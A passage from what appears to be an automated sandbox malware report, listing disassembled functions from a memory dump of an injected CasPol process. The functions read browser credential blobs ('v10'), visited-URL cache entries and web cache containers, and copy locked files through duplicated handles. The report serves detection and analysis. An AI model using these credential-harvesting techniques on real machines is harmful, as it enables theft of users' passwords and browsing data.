                                                                                                                                                                                                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                                                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                                                  • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                                  • API String ID: 2744995895-28296030
                                                                                                                                                                                                                                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                                                                  Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                                  • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                                                                                                                                                  • String ID: chp$v10
                                                                                                                                                                                                                                  • API String ID: 4165125987-2783969131
                                                                                                                                                                                                                                  • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                                                                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                                                                  Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                                  • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                                                                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                                                                  Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                                  • String ID: bhv
                                                                                                                                                                                                                                  • API String ID: 4234240956-2689659898
                                                                                                                                                                                                                                  • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                                                                  Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 643 44671d-446726 641->643 644 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->644 646 446747-44674b 643->646 647 446728-44672d 643->647 652 4467ac-4467b7 __setusermatherr 644->652 653 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 644->653 646->642 648 44674d-44674f 646->648 647->642 650 446734-44673b 647->650 651 446755-446758 648->651 650->642 654 44673d-446745 650->654 651->644 652->653 657 446810-446819 653->657 658 44681e-446825 653->658 654->651 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 664 446834-446838 660->664 665 44683a-44683e 660->665 662 446845-44684b 661->662 663 446872-446877 661->663 667 446853-446864 GetStartupInfoW 662->667 668 44684d-446851 662->668 663->661 664->660 664->665 665->662 669 446840-446842 665->669 671 446866-44686a 667->671 672 446879-44687b 667->672 668->667 668->669 669->662 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2827331108-0
                                                                                                                                                                                                                                  • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                                                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                                                                                                  Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                                                                                                  • String ID: visited:
                                                                                                                                                                                                                                  • API String ID: 1157525455-1702587658
                                                                                                                                                                                                                                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                                                                  Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 free 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                  • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                                                  • API String ID: 2804212203-2982631422
                                                                                                                                                                                                                                  • Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                                                                                                                                                                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                                                                  Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                    • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                                                  • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 115830560-3916222277
                                                                                                                                                                                                                                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                                                                                  Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError free 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 free 812->819 813->812 819->797
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                                  • free.MSVCRT ref: 0041848B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                                                                                  • String ID: |A
                                                                                                                                                                                                                                  • API String ID: 77810686-1717621600
                                                                                                                                                                                                                                  • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                                                                  Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041249C
                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
